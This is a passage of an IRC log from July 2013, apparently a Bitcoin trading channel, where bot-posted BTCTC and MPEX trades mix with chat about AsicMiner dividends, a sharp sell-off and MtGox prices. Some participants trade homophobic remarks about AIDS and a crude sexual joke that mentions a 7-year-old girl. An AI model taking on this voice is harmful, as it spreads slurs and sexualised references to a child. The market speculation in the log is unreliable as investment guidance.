get RSS feed. Jul 03 19:28:05 [BTCTC] [ASICMINER-PT] 1 @ 4.949989 BTC [+] Jul 03 19:29:34 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004376 = 0.0088 BTC [+] Jul 03 19:31:14 <[\\\]> has the asicminer dividend been announced yet? Jul 03 19:32:31 [BTCTC] [DMS.SELLING] 20 @ 0.030989 = 0.6198 BTC [+] Jul 03 19:32:47 no Jul 03 19:33:21 [BTCTC] [DMS.PURCHASE] 2 @ 0.049273 = 0.0985 BTC [-] Jul 03 19:34:07 [BTCTC] [AMC-PT] 1 @ 0.002324 BTC [+] Jul 03 19:34:22 [BTCTC] [ASICMINER-PT] 1 @ 4.906 BTC [-] Jul 03 19:34:27 [BTCTC] [DMS.MINING] 49 @ 0.0205 = 1.0045 BTC [+] Jul 03 19:34:27 [BTCTC] [ASICMINER-PT] 1 @ 4.905501 BTC [-] Jul 03 19:34:30 [BTCTC] [DMS.MINING] 21 @ 0.02075 = 0.4358 BTC [+] Jul 03 19:34:31 [BTCTC] [ASICMINER-PT] 2 @ 4.9055 = 9.811 BTC [-] Jul 03 19:34:32 [BTCTC] [DMS.MINING] 10 @ 0.0208 = 0.208 BTC [+] Jul 03 19:34:34 [MPEX] [S.BBET] [PAID] 2.64061249 BTC to 3`000`000 shares, 88 satoshi per share Jul 03 19:34:35 [BTCTC] [DMS.MINING] 41 @ 0.020878 = 0.856 BTC [+] Jul 03 19:34:36 [BTCTC] [DMS.MINING] 9 @ 0.0209 = 0.1881 BTC [+] Jul 03 19:34:38 [BTCTC] [ASICMINER-PT] 3 @ 4.880001 = 14.64 BTC [-] Jul 03 19:34:40 [BTCTC] [ASICMINER-PT] 8 @ 4.88 = 39.04 BTC [-] Jul 03 19:38:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.05 BTC [-] Jul 03 19:38:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.05 = 0.1 BTC [-] Jul 03 19:41:14 [BTCTC] [BASIC-MINING] 3 @ 0.1749 = 0.5247 BTC [-] Jul 03 19:41:57 [BTCTC] [BASIC-MINING] 3 @ 0.1749 = 0.5247 BTC [-] Jul 03 19:42:42 [BTCTC] [BASIC-MINING] 1 @ 0.1749 BTC [-] Jul 03 19:44:11 [BTCTC] [ASICMINER-PT] 5 @ 4.9 = 24.5 BTC [+] Jul 03 19:44:52 [BTCTC] [PAJKA.BOND] 3 @ 0.057 = 0.171 BTC [+] Jul 03 19:44:59 [MPEX] [S.MPOE] 1000 @ 0.00077583 = 0.7758 BTC [+] Jul 03 19:45:26 [BTCTC] [S.MPOE-PT] 2 @ 0.000992 = 0.002 BTC [+] Jul 03 19:45:48 [BTCTC] [BASIC-MINING] 10 @ 0.175099 = 1.751 BTC [+] Jul 03 19:46:11 http://www.theverge.com/2013/7/3/4490362/boxee-acquired-by-samsung-in-surprise-deal-according-to-report Jul 03 19:46:15 Boxee acquired by Samsung for about $30 million in surprise deal, according to report | The Verge Jul 03 19:46:51 http://gizmodo.com/bone-marrow-transplants-remove-all-sign-of-hiv-in-two-m-656499163 Jul 03 19:46:53 Bone Marrow Transplants Remove All Sign of HIV in Two Men Jul 03 19:49:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.05 = 0.1 BTC [-] Jul 03 19:49:50 awesome TAT Jul 03 19:50:36 [BTCTC] [TAT.ASICMINER] 8 @ 0.050878 = 0.407 BTC [+] Jul 03 19:51:42 Fuck AIDs! Jul 03 19:52:14 AIDS* Jul 03 19:52:53 [BTCTC] [PAJKA.BOND] 5 @ 0.057 = 0.285 BTC [+] Jul 03 19:53:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.05 BTC [-] Jul 03 19:53:56 [BTCTC] [BASIC-MINING] 2 @ 0.18 = 0.36 BTC [+] Jul 03 19:55:10 [BTCTC] [TAT.ASICMINER] 34 @ 0.0495 = 1.683 BTC [-] Jul 03 19:56:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.050878 BTC [+] Jul 03 19:56:24 [BTCTC] [ASICMINER-PT] 1 @ 4.949998 BTC [+] Jul 03 19:56:26 [BTCTC] [ASICMINER-PT] 5 @ 4.949999 = 24.75 BTC [+] Jul 03 19:58:02 oh wow they get to be as gay as they want to be now Jul 03 19:58:15 uhhh ok Jul 03 19:59:16 promiscuity and unsafe sex are the best ways to express homosexuality of course Jul 03 19:59:20 this entire gay-aids thing is such bs Jul 03 19:59:30 most aids sufferers are black heterosexual ppls. Jul 03 20:00:50 [BTCTC] [BASIC-MINING] 18 @ 0.18 = 3.24 BTC [+] Jul 03 20:02:35 but it was the gays who started it! it was the gays! Jul 03 20:02:45 it was that whore Chimp! Jul 03 20:02:50 From a gay whore chimp! Jul 03 20:03:03 [MPEX] [S.MPOE] 2931 @ 0.00077583 = 2.274 BTC [+] Jul 03 20:03:05 i don't think the chimp was gay Jul 03 20:03:16 he was if he gave it to some gay dude.. Jul 03 20:03:30 if you fucked chimps i bet you'd fuck female ones Jul 03 20:03:41 depends on how tight they are Jul 03 20:03:45 seeing how the average adult chimp weighs about the same as a 7 year old girl Jul 03 20:03:47 if I was a bonobo I would fuck all Jul 03 20:03:55 in order to solve social stresses Jul 03 20:04:03 including with same-sex bonobos Jul 03 20:04:07 because that's wat they do Jul 03 20:04:34 stupid god, made me a human. Jul 03 20:08:16 [BTCTC] [RSM] 1 @ 0.016006 BTC [+] Jul 03 20:08:16 http://www.worldtransformation.com/freedom-book1-bonobos-evidence-whole-love-indoctrination-process/ Jul 03 20:08:20 Bonobos evidence the whole love-indoctrination process | WTM Jul 03 20:08:29 [BTCTC] [ASICMINER-PT] 1 @ 4.9 BTC [-] Jul 03 20:08:31 [BTCTC] [ASICMINER-PT] 5 @ 4.89 = 24.45 BTC [-] Jul 03 20:08:39 [BTCTC] [AMC-PT] 4 @ 0.002319 = 0.0093 BTC [-] Jul 03 20:08:40 [BTCTC] [AMC-PT] 12 @ 0.00232 = 0.0278 BTC [+] Jul 03 20:10:38 [BTCTC] [AMC-PT] 100 @ 0.002325 = 0.2325 BTC [+] Jul 03 20:11:17 [BTCTC] [COGNITIVE] 1 @ 0.321219 BTC [-] Jul 03 20:13:11 http://trilema.com/2013/the-onlinns-of-court/ Jul 03 20:13:14 The onlinns of court pe Trilema - Un blog de Mircea Popescu. Jul 03 20:13:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.049208 BTC [-] Jul 03 20:13:29 minute long introduction to the fundaments of law for the benefit of bitcoin ppl Jul 03 20:13:37 [BTCTC] [ASICMINER-PT] 7 @ 4.999878 = 34.9991 BTC [+] Jul 03 20:13:37 (who are remarkably innocent on said fundamentals) Jul 03 20:13:39 [BTCTC] [ASICMINER-PT] 8 @ 5 = 40 BTC [+] Jul 03 20:13:44 [BTCTC] [ASICMINER-PT] 2 @ 5.013 = 10.026 BTC [+] Jul 03 20:13:45 [BTCTC] [ASICMINER-PT] 1 @ 5.014 BTC [+] Jul 03 20:15:47 [BTCTC] [BITVPS] 1 @ 0.001513 BTC [-] Jul 03 20:16:35 [BTCTC] [COGNITIVE] 1 @ 0.35 BTC [+] Jul 03 20:17:40 [BTCTC] [ASICMINER-PT] 2 @ 5.015 = 10.03 BTC [+] Jul 03 20:17:42 [BTCTC] [ASICMINER-PT] 2 @ 5.017 = 10.034 BTC [+] Jul 03 20:17:44 [BTCTC] [ASICMINER-PT] 1 @ 5.018 BTC [+] Jul 03 20:17:46 [BTCTC] [ASICMINER-PT] 2 @ 5.019 = 10.038 BTC [+] Jul 03 20:18:02 [BTCTC] [GSDPT] 1 @ 0.00235 BTC [-] Jul 03 20:20:57 [BTCTC] [BMF] 1 @ 0.038 BTC [+] Jul 03 20:21:37 [BTCTC] [TAT.ASICMINER] 36 @ 0.050878 = 1.8316 BTC [+] Jul 03 20:22:16 is asicminer ever going to stop going up Jul 03 20:22:26 6btc per share is a bit extreme Jul 03 20:22:49 i was thinking max valuation a month ago was like 3.2 Jul 03 20:22:54 based on network Jul 03 20:23:32 [BTCTC] [S.MPOE-PT] 1 @ 0.000992 BTC [+] Jul 03 20:23:43 It's been my cashcow so I hope not :) Jul 03 20:24:00 i've squeezed it three good times now Jul 03 20:24:36 6+ is till possible Jul 03 20:24:48 if they release the new blades next week Jul 03 20:24:53 network went from 0.013 to 0.015 in divs but seems like ppl simply accepted a lower APR than 60%. seems 25% is acceptable for the time being Jul 03 20:25:15 and everyone was saying AM couldnt sustain the divs. "YOU THINK THIS IS GONNA LAST? NOOB" Jul 03 20:25:21 7 divs later... Jul 03 20:25:30 well... Jul 03 20:25:58 anything can happen from here Jul 03 20:26:16 maybe it wont last an entire year to see that APR but for now it's not bad for another 3 weeks i'd say based on where bfl, avalon, knc, and bitfury stand Jul 03 20:26:19 i've gotten so cautious I doubt i go in for a fourth buy at this late juncture Jul 03 20:26:19 but AM has indeed painted a future of being able to at least pay .015 for the rest of the year Jul 03 20:26:35 regardless of hardware sales Jul 03 20:27:16 [BTCTC] [DMS.SELLING] 10 @ 0.03 = 0.3 BTC [-] Jul 03 20:27:18 [BTCTC] [DMS.SELLING] 1 @ 0.0292 BTC [-] Jul 03 20:27:18 [BTCTC] [DMS.SELLING] 10 @ 0.029 = 0.29 BTC [-] Jul 03 20:27:21 [BTCTC] [DMS.SELLING] 50 @ 0.0285 = 1.425 BTC [-] Jul 03 20:27:21 [BTCTC] [DMS.SELLING] 1 @ 0.02842 BTC [-] Jul 03 20:27:22 [BTCTC] [DMS.SELLING] 10 @ 0.02841 = 0.2841 BTC [-] Jul 03 20:27:24 if the div is more than 0.03 this week, i'm absolutely buying before hardware sales Jul 03 20:27:24 [BTCTC] [DMS.SELLING] 8 @ 0.02831 = 0.2265 BTC [-] Jul 03 20:27:28 its not Jul 03 20:27:36 its about 0.02297 Jul 03 20:27:36 i doubt it Jul 03 20:27:54 you are only using the public groupbuy data Jul 03 20:27:57 what about the resellers Jul 03 20:28:05 It's been my cashcow so I hope not :) << you'll eventually learn to quit in time. Jul 03 20:28:09 i doubt they're up and running but im not going to say never Jul 03 20:28:17 0.022 sounds likely Jul 03 20:28:25 [BTCTC] [DMS.PURCHASE] 100 @ 0.049273 = 4.9273 BTC [-] Jul 03 20:28:48 we should run a pool. Jul 03 20:28:49 [BTCTC] [ASICMINER-PT] 5 @ 4.925006 = 24.625 BTC [-] Jul 03 20:29:12 ThickAsThieves: oh you saw it already Jul 03 20:29:13 0.02297025 is the official div Jul 03 20:29:21 [BTCTC] [BASIC-MINING] 1 @ 0.184979 BTC [+] Jul 03 20:30:54 [BTCTC] [ASICMINER-PT] 2 @ 4.925008 = 9.85 BTC [+] Jul 03 20:30:54 a betting pool or a mining pool? Jul 03 20:30:59 [BTCTC] [ASICMINER-PT] 1 @ 4.925001 BTC [-] Jul 03 20:31:01 [BTCTC] [ASICMINER-PT] 1 @ 4.925 BTC [-] Jul 03 20:31:14 [BTCTC] [ASICMINER-PT] 1 @ 4.920004 BTC [-] Jul 03 20:31:20 [BTCTC] [ASICMINER-PT] 8 @ 4.92 = 39.36 BTC [-] Jul 03 20:31:22 [BTCTC] [ASICMINER-PT] 1 @ 4.9 BTC [-] Jul 03 20:31:30 someone gonna try and force a dip here Jul 03 20:31:39 lets see how big their balls are Jul 03 20:32:03 a ok Jul 03 20:32:14 [BTCTC] [ASICMINER-PT] 4 @ 4.878001 = 19.512 BTC [-] Jul 03 20:32:15 jcpham i thought it wasn't announced yet Jul 03 20:32:36 i do not think it has been? Jul 03 20:32:40 [BTCTC] [ASICMINER-PT] 5 @ 4.878 = 24.39 BTC [-] Jul 03 20:32:42 [BTCTC] [ASICMINER-PT] 2 @ 4.871001 = 9.742 BTC [-] Jul 03 20:32:44 [BTCTC] [ASICMINER-PT] 6 @ 4.86 = 29.16 BTC [-] Jul 03 20:32:46 [BTCTC] [ASICMINER-PT] 5 @ 4.8502 = 24.251 BTC [-] Jul 03 20:32:57 the problem with shorting this piece of shit is that once it reaches 5 there are fiddy billion idiots screaming omg 5 cash coqw win win win we are investors Jul 03 20:32:57 nice Jul 03 20:33:04 but if you sell twenty shares it drops 20% Jul 03 20:33:11 da fuck. get some money ppl. Jul 03 20:33:12 [BTCTC] [ASICMINER-PT] 4 @ 4.8502 = 19.4008 BTC [-] Jul 03 20:33:14 [BTCTC] [ASICMINER-PT] 50 @ 4.850001 = 242.5001 BTC [-] Jul 03 20:33:16 [BTCTC] [ASICMINER-PT] 71 @ 4.85 = 344.35 BTC [-] Jul 03 20:33:21 ohh lala Jul 03 20:33:22 look at that Jul 03 20:33:38 [BTCTC] [B.YABMC] 1 @ 0.006498 BTC [+] Jul 03 20:33:53 [BTCTC] [ASICMINER-PT] 1 @ 4.85 BTC [-] Jul 03 20:34:11 [BTCTC] [TAT.ASICMINER] 50 @ 0.049211 = 2.4606 BTC [-] Jul 03 20:34:16 [BTCTC] [TAT.ASICMINER] 58 @ 0.04921 = 2.8542 BTC [-] Jul 03 20:34:20 [BTCTC] [TAT.ASICMINER] 9 @ 0.049208 = 0.4429 BTC [-] Jul 03 20:34:22 [BTCTC] [TAT.ASICMINER] 3 @ 0.049202 = 0.1476 BTC [-] Jul 03 20:34:24 [BTCTC] [TAT.ASICMINER] 20 @ 0.0492 = 0.984 BTC [-] Jul 03 20:34:26 [BTCTC] [TAT.ASICMINER] 8 @ 0.04915 = 0.3932 BTC [-] Jul 03 20:34:31 [BTCTC] [TAT.ASICMINER] 25 @ 0.04915 = 1.2288 BTC [-] Jul 03 20:34:33 [BTCTC] [TAT.ASICMINER] 9 @ 0.049105 = 0.4419 BTC [-] Jul 03 20:34:46 panic! Jul 03 20:34:52 that was like 50grand of btctc sell's Jul 03 20:35:00 if i'm not mistaken Jul 03 20:35:04 yup Jul 03 20:35:16 didnt break the floor though Jul 03 20:35:20 need more panic Jul 03 20:35:20 ;;ticker Jul 03 20:35:21 nope Jul 03 20:35:22 MtGox BTCUSD ticker | Best bid: 82.63815, Best ask: 82.71198, Bid-ask spread: 0.07383, Last trade: 82.63815, 24 hour volume: 42006.74813274, 24 hour low: 81.86753, 24 hour high: 91.25000, 24 hour vwap: 86.64282 Jul 03 20:35:26 just about Jul 03 20:35:26 moar moar moar! Jul 03 20:35:34 [BTCTC] [ASICMINER-PT] 25 @ 4.85 = 121.25 BTC [-] Jul 03 20:35:37 yay Jul 03 20:35:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.049016 = 0.4902 BTC [-] Jul 03 20:35:40 [BTCTC] [TAT.ASICMINER] 91 @ 0.049015 = 4.4604 BTC [-] Jul 03 20:35:43 [BTCTC] [TAT.ASICMINER] 5 @ 0.049 = 0.245 BTC [-] Jul 03 20:35:44 [BTCTC] [TAT.ASICMINER] 15 @ 0.049 = 0.735 BTC [-] Jul 03 20:35:46 [BTCTC] [TAT.ASICMINER] 9 @ 0.049 = 0.441 BTC [-] Jul 03 20:35:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.04915 BTC [+] Jul 03 20:36:17 [BTCTC] [AMC-PT] 1 @ 0.002349 BTC [+] Jul 03 20:36:20 [BTCTC] [TAT.ASICMINER] 11 @ 0.049 = 0.539 BTC [-] Jul 03 20:36:21 [BTCTC] [ASICMINER-PT] 3 @ 4.85 = 14.55 BTC [-] Jul 03 20:36:26 [BTCTC] [TAT.ASICMINER] 11 @ 0.048601 = 0.5346 BTC [-] Jul 03 20:36:31 [BTCTC] [TAT.ASICMINER] 19 @ 0.0486 = 0.9234 BTC [-] Jul 03 20:36:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.04855 = 0.4855 BTC [-] Jul 03 20:36:38 [BTCTC] [TAT.ASICMINER] 10 @ 0.04855 = 0.4855 BTC [-] Jul 03 20:36:40 [BTCTC] [TAT.ASICMINER] 50 @ 0.0485 = 2.425 BTC [-] Jul 03 20:36:57 [BTCTC] [ASICMINER-PT] 1 @ 4.8211 BTC [-] Jul 03 20:37:12 [BTCTC] [ASICMINER-PT] 1 @ 4.82 BTC [-] Jul 03 20:37:29 need more panic << gentleman is served ? Jul 03 20:37:43 [BTCTC] [TAT.ASICMINER] 28 @ 0.0484 = 1.3552 BTC [-] Jul 03 20:38:09 i wanna see 4.5 Jul 03 20:38:26 or .45 Jul 03 20:38:29 [BTCTC] [TAT.ASICMINER] 10 @ 0.0484 = 0.484 BTC [-] Jul 03 20:38:41 well i'm buying so... Jul 03 20:38:46 [BTCTC] [ASICMINER-PT] 1 @ 4.800001 BTC [-] Jul 03 20:38:57 [BTCTC] [ASICMINER-PT] 5 @ 4.8 = 24 BTC [-] Jul 03 20:38:59 [BTCTC] [TAT.ASICMINER] 3 @ 0.048 = 0.144 BTC [-] Jul 03 20:39:07 perhaps hold off on that a little bit. Jul 03 20:39:54 you think today is a big btc/usd crash? Jul 03 20:41:00 how did that get mixed in the discussion ? Jul 03 20:41:16 just trying to suss your logic Jul 03 20:41:21 you checked the ticker Jul 03 20:41:24 mid-topic Jul 03 20:41:35 i'm not saying a word now Jul 03 20:41:40 [BTCTC] [ASICMINER-PT] 5 @ 4.8 = 24 BTC [-] Jul 03 20:41:44 [BTCTC] [ASICMINER-PT] 25 @ 4.760001 = 119 BTC [-] Jul 03 20:41:47 [BTCTC] [ASICMINER-PT] 22 @ 4.76 = 104.72 BTC [-] Jul 03 20:41:47 too much action after i spoke last time Jul 03 20:41:48 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 03 20:41:53 [BTCTC] [ASICMINER-PT] 1 @ 4.55 BTC [-] Jul 03 20:41:59 [BTCTC] [ASICMINER-PT] 1 @ 4.541 BTC [-] Jul 03 20:42:08 [BTCTC] [ASICMINER-PT] 2 @ 4.521 = 9.042 BTC [-] Jul 03 20:42:13 [BTCTC] [ASICMINER-PT] 20 @ 3.55 = 71 BTC [-] Jul 03 20:42:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.048001 = 0.48 BTC [+] Jul 03 20:42:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.048 = 0.48 BTC [-] Jul 03 20:42:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.048 = 0.24 BTC [-] Jul 03 20:42:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.047006 BTC [-] Jul 03 20:42:23 [BTCTC] [TAT.ASICMINER] 15 @ 0.047003 = 0.705 BTC [-] Jul 03 20:42:25 [BTCTC] [TAT.ASICMINER] 30 @ 0.047002 = 1.4101 BTC [-] Jul 03 20:42:27 [BTCTC] [TAT.ASICMINER] 10 @ 0.047001 = 0.47 BTC [-] Jul 03 20:42:29 [BTCTC] [TAT.ASICMINER] 4 @ 0.047 = 0.188 BTC [-] Jul 03 20:42:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.047 = 0.094 BTC [-] Jul 03 20:42:37 [BTCTC] [TAT.ASICMINER] 200 @ 0.047 = 9.4 BTC [-] Jul 03 20:42:39 [BTCTC] [TAT.ASICMINER] 100 @ 0.0465 = 4.65 BTC [-] Jul 03 20:42:48 ThickAsThieves someone said 50k, i took it to be in reference to the girl's statement that the stock is backed by 500 mup[pes with 50k between them Jul 03 20:43:02 and i wanted to see if it works out. lo and behold, it did. girl is smarter than people think. Jul 03 20:43:21 and did i just see 3.5 trading ? Jul 03 20:43:25 options Jul 03 20:43:36 anyway. you got your 4.5 it seems. Jul 03 20:43:44 yep Jul 03 20:44:11 4.5, where? Jul 03 20:44:30 i still think btcusd will dip more today Jul 03 20:44:39 and that will spur more AM sells Jul 03 20:45:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.0465 = 0.093 BTC [-] Jul 03 20:45:58 [BTCTC] [ASICMINER-PT] 1 @ 4.56 BTC [+] Jul 03 20:46:01 [BTCTC] [ASICMINER-PT] 1 @ 4.55 BTC [-] Jul 03 20:46:03 [BTCTC] [ASICMINER-PT] 1 @ 4.541 BTC [-] Jul 03 20:46:06 [BTCTC] [ASICMINER-PT] 5 @ 4.540001 = 22.7 BTC [-] Jul 03 20:46:10 [BTCTC] [GSDPT] 11 @ 0.00235 = 0.0259 BTC [-] Jul 03 20:46:10 [BTCTC] [ASICMINER-PT] 2 @ 4.54 = 9.08 BTC [-] Jul 03 20:46:19 [BTCTC] [ASICMINER-PT] 1 @ 4.521 BTC [-] Jul 03 20:46:34 [BTCTC] [TAT.ASICMINER] 7 @ 0.0465 = 0.3255 BTC [-] Jul 03 20:47:04 [BTCTC] [ASICMINER-PT] 2 @ 4.561 = 9.122 BTC [+] Jul 03 20:47:13 [BTCTC] [ASICMINER-PT] 30 @ 4.56 = 136.8 BTC [-] Jul 03 20:47:18 [BTCTC] [ASICMINER-PT] 1 @ 4.541 BTC [-] Jul 03 20:47:20 [BTCTC] [ASICMINER-PT] 5 @ 4.5401 = 22.7005 BTC [-] Jul 03 20:47:25 [BTCTC] [ASICMINER-PT] 1 @ 4.52 BTC [-] Jul 03 20:47:30 [BTCTC] [ASICMINER-PT] 1 @ 4.510001 BTC [-] Jul 03 20:47:33 come on down Jul 03 20:47:37 [BTCTC] [ASICMINER-PT] 1 @ 4.51 BTC [-] Jul 03 20:47:40 [BTCTC] [TAT.ASICMINER] 35 @ 0.0465 = 1.6275 BTC [-] Jul 03 20:47:42 [BTCTC] [ASICMINER-PT] 1 @ 4.50009 BTC [-] Jul 03 20:47:46 [BTCTC] [TAT.ASICMINER] 42 @ 0.0465 = 1.953 BTC [-] Jul 03 20:47:47 [BTCTC] [ASICMINER-PT] 10 @ 4.50009 = 45.0009 BTC [-] Jul 03 20:47:54 [BTCTC] [ASICMINER-PT] 48 @ 4.50008 = 216.0038 BTC [-] Jul 03 20:48:01 YES! Jul 03 20:48:19 got my 4.50009000 purchase :) Jul 03 20:48:21 [BTCTC] [TAT.ASICMINER] 128 @ 0.0465 = 5.952 BTC [-] Jul 03 20:48:22 [BTCTC] [ASICMINER-PT] 2 @ 4.50008 = 9.0002 BTC [-] Jul 03 20:48:23 [BTCTC] [TAT.ASICMINER] 15 @ 0.046 = 0.69 BTC [-] Jul 03 20:48:27 [BTCTC] [TAT.ASICMINER] 13 @ 0.0455 = 0.5915 BTC [-] Jul 03 20:48:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.045101 = 0.1353 BTC [-] Jul 03 20:48:30 dont celebrate yet Jul 03 20:48:40 [BTCTC] [ASICMINER-PT] 1 @ 4.50008 BTC [-] Jul 03 20:48:54 I """panic""" sold at 4.85, I intend to hold Jul 03 20:49:08 but decided to have some fun Jul 03 20:49:11 [BTCTC] [ASICMINER-PT] 1 @ 4.56 BTC [+] Jul 03 20:50:51 [BTCTC] [ASICMINER-PT] 1 @ 4.5 BTC [-] Jul 03 20:51:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.0466 = 0.0932 BTC [+] Jul 03 20:51:26 [BTCTC] [TAT.ASICMINER] 20 @ 0.0458 = 0.916 BTC [-] Jul 03 20:51:28 [BTCTC] [TAT.ASICMINER] 7 @ 0.045101 = 0.3157 BTC [-] Jul 03 20:51:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.045101 = 0.2255 BTC [-] Jul 03 20:51:31 [BTCTC] [TAT.ASICMINER] 25 @ 0.045101 = 1.1275 BTC [-] Jul 03 20:51:33 [BTCTC] [TAT.ASICMINER] 300 @ 0.0451 = 13.53 BTC [-] Jul 03 20:51:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.0451 = 0.451 BTC [-] Jul 03 20:51:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.048999 BTC [+] Jul 03 20:51:48 how long has havelock been dead Jul 03 20:52:05 havelock is dead? Jul 03 20:52:13 for me it's extra dead Jul 03 20:52:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.048999 BTC [+] Jul 03 20:52:19 about an hour Jul 03 20:52:29 why is it dead? Jul 03 20:52:31 that's about when i noticed Jul 03 20:52:41 cloudflare page Jul 03 20:52:41 [BTCTC] [ASICMINER-PT] 1 @ 4.5411 BTC [+] Jul 03 20:53:14 [BTCTC] [ASICMINER-PT] 3 @ 4.5411 = 13.6233 BTC [+] Jul 03 20:54:01 oh, come on, my order is the top on TAT.ASICMINER, why did the dumping suddenly stop? Jul 03 20:54:17 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.004376 = 0.035 BTC [+] Jul 03 20:54:23 ;;ticker Jul 03 20:54:25 MtGox BTCUSD ticker | Best bid: 82.99500, Best ask: 83.00000, Bid-ask spread: 0.00500, Last trade: 83.00000, 24 hour volume: 41975.29603993, 24 hour low: 81.86753, 24 hour high: 91.25000, 24 hour vwap: 86.59569 Jul 03 20:55:56 [BTCTC] [ASICMINER-PT] 1 @ 4.4601 BTC [-] Jul 03 20:56:02 [BTCTC] [ASICMINER-PT] 1 @ 4.46 BTC [-] Jul 03 20:56:06 [BTCTC] [ASICMINER-PT] 1 @ 4.451 BTC [-] Jul 03 20:56:13 [BTCTC] [ASICMINER-PT] 5 @ 4.411 = 22.055 BTC [-] Jul 03 20:56:18 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [-] Jul 03 20:56:34 4.41 eh Jul 03 20:57:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.0459 = 0.1377 BTC [-] Jul 03 20:57:03 [BTCTC] [TAT.ASICMINER] 24 @ 0.0456 = 1.0944 BTC [-] Jul 03 20:57:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.0455 BTC [-] Jul 03 20:57:17 [BTCTC] [TAT.ASICMINER] 10 @ 0.045 = 0.45 BTC [-] Jul 03 20:57:36 ah, there it is Jul 03 20:57:42 [BTCTC] [ASICMINER-PT] 1 @ 4.67 BTC [+] Jul 03 20:57:51 you're welcome Jul 03 20:58:04 hm, is someone running a 1 buy bot ? Jul 03 20:58:27 [BTCTC] [TAT.ASICMINER] 15 @ 0.0445 = 0.6675 BTC [-] Jul 03 20:59:03 [BTCTC] [TAT.ASICMINER] 4 @ 0.04423 = 0.1769 BTC [-] Jul 03 20:59:19 [BTCTC] [ASICMINER-PT] 3 @ 4.4201 = 13.2603 BTC [-] Jul 03 21:00:24 damn Jul 03 21:00:33 [BTCTC] [ASICMINER-PT] 1 @ 4.421 BTC [+] Jul 03 21:00:34 sweet sweet volatility Jul 03 21:00:51 [BTCTC] [AMC-PT] 200 @ 0.00234 = 0.468 BTC [-] Jul 03 21:01:14 [BTCTC] [ASICMINER-PT] 2 @ 4.4201 = 8.8402 BTC [-] Jul 03 21:01:25 [BTCTC] [TAT.ASICMINER] 48 @ 0.044231 = 2.1231 BTC [+] Jul 03 21:01:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.04423 BTC [-] Jul 03 21:01:31 [MPEX] [S.MPOE] 6169 @ 0.00077583 = 4.7861 BTC [+] Jul 03 21:01:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.04422 = 0.4422 BTC [-] Jul 03 21:01:37 [BTCTC] [BASIC-MINING] 4 @ 0.180001 = 0.72 BTC [-] Jul 03 21:01:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.04411 BTC [-] Jul 03 21:01:41 [BTCTC] [AMC-PT] 170 @ 0.00234 = 0.3978 BTC [-] Jul 03 21:01:48 <__blasty> so this is where I panicsell my AM-PT's or how does this game work Jul 03 21:02:14 a bit too late Jul 03 21:02:14 [BTCTC] [AMC-PT] 99 @ 0.002349 = 0.2326 BTC [+] Jul 03 21:02:28 but now I want to write a sell-then-buy bot Jul 03 21:02:50 yeah, panicsell and then panicbuy when the price starts going back up soon thereafter Jul 03 21:02:54 [BTCTC] [AMC-PT] 91 @ 0.00235 = 0.2139 BTC [+] Jul 03 21:03:03 <__blasty> peterl: :) Jul 03 21:03:21 I didn't even have the time to submit the form that prices changed Jul 03 21:03:24 __blasty the game goes like this : you ask teh public what to dow ith your btc Jul 03 21:03:33 because as an "investor" you have no clue. Jul 03 21:03:39 <__blasty> exactly Jul 03 21:03:58 alternatively you could call a friend Jul 03 21:04:00 <__blasty> good thing I don't consider myself an investor Jul 03 21:04:10 gameshow freakreality. Jul 03 21:04:21 from here i'd say we have about 10m left of possible dropping Jul 03 21:04:26 unless btc/usd falls again Jul 03 21:04:34 ;;ticker Jul 03 21:04:36 MtGox BTCUSD ticker | Best bid: 82.80000, Best ask: 82.99000, Bid-ask spread: 0.19000, Last trade: 82.80000, 24 hour volume: 41637.47792462, 24 hour low: 81.86753, 24 hour high: 91.25000, 24 hour vwap: 86.55655 Jul 03 21:04:54 if it breaks 80 Jul 03 21:04:56 so I just bought those TAT.AM shares at 0.045, should I sell them at 0.09, or go for 10x and sell at .45? Jul 03 21:04:57 expect more panic Jul 03 21:05:39 ThickAsThieves you seriously think .15 in best bid has an effect ? Jul 03 21:05:51 [BTCTC] [ASICMINER-PT] 1 @ 4.569999 BTC [+] Jul 03 21:06:05 https://bitcointalk.org/index.php?topic=244439.msg2646124#msg2646124 Jul 03 21:06:12 awww, "mtgox are now in default" teh cuteness, srlsy. Jul 03 21:06:15 So what happens if Gox misses their deadline in one week? Jul 03 21:06:37 hehe Jul 03 21:06:58 i'm just saying what i think will happen Jul 03 21:07:05 not that it makes perfect sense Jul 03 21:07:08 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [-] Jul 03 21:07:08 reddit better pray i don't say "reddit is fucked" next. Jul 03 21:07:47 and i think we may break 80 today Jul 03 21:07:57 who is still using Gox? I pulled everything out of them a while ago Jul 03 21:08:42 I feel like there should be a sex joke in there, but I don't see it Jul 03 21:09:14 [BTCTC] [ASICMINER-PT] 1 @ 4.56 BTC [+] Jul 03 21:10:01 [BTCTC] [ASICMINER-PT] 1 @ 4.559999 BTC [-] Jul 03 21:10:14 time for the turnaround Jul 03 21:10:29 well wait. we're breaking 80 or turning around ? Jul 03 21:10:36 turnaroun on AM Jul 03 21:10:48 people funding accounts to "buy cheap shares" Jul 03 